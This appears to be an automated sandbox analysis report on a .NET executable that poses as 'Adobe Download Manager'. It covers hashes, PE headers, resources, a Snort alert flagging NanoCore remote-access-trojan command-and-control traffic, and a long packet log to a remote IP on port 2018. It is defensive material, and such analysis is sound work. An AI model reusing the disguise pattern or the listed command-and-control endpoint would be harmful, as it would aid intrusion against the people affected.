                                                                          SHA512:674ad1360e6ed0e1c77865858c08950d6955f8a56544343e9414320470d80258e4fad0d67ee64423cbc792bfbf2cd6fee2c1806a837b61f62b7f71c10fe2d9fc
                                                                          SSDEEP:12288:UyVRMbXAPtBXomNFYmujpihOcn92JRVkxdGOcA1WJIq:UyVRxPtB3Cjpihvn+VkxIE1c

                                                                          File Icon

                                                                          Icon Hash:4e9292f2c88cd3cc

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x48c6ea
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0xC8D6E03A [Sat Oct 10 03:15:06 2076 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:v4.0.30319
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8c698          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8e000          0x2d0c        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x92000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x8c67c          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x8a6f0       0x8a800   False     0.74459012579    data       6.19707511101   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x8e000          0x2d0c        0x2e00    False     0.148522418478   data       3.29118714119   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x92000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size    Type                                                                                                                      Language  Country
RT_ICON        0x8e100  0x25a8  dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134217728, next used block 117440512
RT_GROUP_ICON  0x906b8  0x14    data
RT_VERSION     0x906dc  0x430   data
RT_MANIFEST    0x90b1c  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2019 Adobe Inc. All rights reserved.
Assembly Version  2.0.0.592
InternalName      ConsoleApp18709999999999999999.exe
FileVersion       2.0.0.592
CompanyName       Adobe Inc
LegalTrademarks
Comments          Adobe Download Manager
ProductName       Adobe Download Manager
ProductVersion    2.0.0.592
FileDescription   Adobe Download Manager
OriginalFilename  ConsoleApp18709999999999999999.exe

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                             Source Port  Dest Port  Source IP    Dest IP
07/22/21-09:33:52.108416  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49704        2018       192.168.2.3  217.138.212.57

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Jul 22, 2021 09:33:50.806400061 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:51.963380098 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:51.963871002 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:52.108416080 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:53.019690990 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:53.019798040 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:53.281886101 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:53.282010078 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:53.799725056 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:53.799973965 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:54.673887014 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:54.712150097 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:55.432821035 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.470251083 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.487173080 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.487313032 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:55.514666080 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.542630911 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.542725086 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:55.568679094 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.598782063 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.598872900 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:55.638338089 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.673640966 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.673707962 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:55.700371027 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.727716923 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:55.727771997 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.197894096 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.224483013 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.224617958 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.250488997 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.273921013 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.273997068 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.292437077 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.328677893 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.328763008 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.359198093 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.386095047 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.386173010 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.408067942 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.432426929 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.433077097 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.453711987 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.488806963 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.488982916 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.507988930 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.528382063 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.529011011 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.558902025 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.586736917 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.586827993 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.609428883 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.637464046 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.637551069 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.663389921 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.685360909 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.686065912 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.882875919 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.914400101 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.914520979 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.929743052 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.953509092 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:56.953849077 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:56.973794937 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.005930901 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.006145000 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.034375906 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.057420015 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.057521105 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.088378906 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.123553038 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.123647928 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.149461985 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.167922974 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.168118000 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.196690083 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.224085093 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.224186897 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.254780054 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.286422968 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.286598921 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.313440084 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.339306116 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.339427948 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.367708921 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.393449068 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.393815994 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.419385910 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.448307037 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.449094057 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.472345114 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.490677118 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.493109941 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.512346029 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.531621933 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.531805992 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.565617085 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.600038052 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.600147963 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.627315044 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.649420023 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.651932001 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.685394049 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.709357977 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.709516048 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.727998018 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.756439924 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.756548882 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.788338900 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.815972090 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.816129923 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.848416090 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.876765966 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.876846075 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.901365042 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.929755926 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.929888964 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.953505993 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.970360994 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:57.977525949 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:57.977705956 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.007711887 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.007833004 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.036288977 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.036396027 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.065438032 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.065526962 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.090743065 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.091059923 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.116054058 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.116194963 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.141679049 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.142575979 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.170353889 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.170442104 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.190574884 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.190653086 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.208452940 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.208565950 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.245791912 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.247507095 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.270452976 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.270591974 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.290522099 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.290663958 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.315365076 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.315468073 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.347409964 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.347614050 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.366439104 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.366560936 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.394625902 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.394722939 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.413409948 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.413546085 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.447184086 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.447299004 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.485466957 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.485636950 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.499453068 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.499569893 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.544435024 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.544568062 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.567475080 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.567565918 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.602224112 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.602329969 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.630417109 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.630613089 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.650666952 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.650803089 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.688375950 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.688538074 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.716331005 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.716440916 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.742325068 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.742399931 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.768410921 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.768518925 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.804416895 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.804524899 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.831408024 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.831535101 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.851070881 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.851517916 CEST  49704        2018       192.168.2.3     217.138.212.57
Jul 22, 2021 09:33:58.890429974 CEST  2018         49704      217.138.212.57  192.168.2.3
Jul 22, 2021 09:33:58.890901089 CEST  49704        2018       192.168.2.3     217.138.212.57
                                                                          Jul 22, 2021 09:33:58.914354086 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.914544106 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.938520908 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.939717054 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.957366943 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.959057093 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.974874973 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.974972010 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.006392002 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.006573915 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.022389889 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.022502899 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.037319899 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.038822889 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.050276041 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.050388098 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.064431906 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.064519882 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.088741064 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.089245081 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.111320972 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.111830950 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.126399994 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.126507998 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.146881104 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.147097111 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.165412903 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.169356108 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.175302029 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.197238922 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.197664976 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.206608057 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.218322992 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.218430996 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.230401993 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.243815899 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.243977070 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.255387068 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.265451908 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.265589952 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.278846979 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.287462950 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.287570953 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.298373938 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.308828115 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.308973074 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.319272995 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.330368042 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.333228111 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.342777967 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.359487057 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.359646082 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.368436098 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.380326986 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.380441904 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.389435053 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.399447918 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.399561882 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.411402941 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.423778057 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.425244093 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.434391022 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.443357944 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.443479061 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.453443050 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.462841988 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.462966919 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.471507072 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.479412079 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.479569912 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.491390944 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.500348091 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.500430107 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.508771896 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.516434908 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.516561031 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.523317099 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.531476021 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.531641960 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.539829969 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.577497005 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.581422091 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.590446949 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.627419949 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.627604008 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.635809898 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.648449898 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.648989916 CEST497042018192.168.2.3217.138.212.57
